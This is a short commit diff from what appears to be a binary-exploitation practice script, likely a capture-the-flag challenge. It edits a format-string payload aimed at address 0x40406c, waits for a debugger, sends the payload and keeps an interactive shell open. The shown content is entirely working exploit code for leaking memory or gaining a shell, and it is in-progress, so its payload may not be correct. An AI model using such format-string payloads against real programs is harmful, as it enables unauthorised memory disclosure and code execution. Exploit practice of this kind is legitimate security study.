This commit is contained in:
2025-03-11 20:12:21 +01:00
parent 07846953f0
commit 40fc9f70bd
14 changed files with 927 additions and 1 deletions

View File

@@ -23,7 +23,9 @@ bug_addr = 0x40406c
# Example interaction
recv_until(b'What is your name?')
payload = b"\x6c\x40\x40 %x %x %x %x %s"
payload = b"\x40\x40\x6c" + b"%08$6x\n"
print("enter if gdb attached")
input()
send_payload(payload)
interact() # Keep the shell open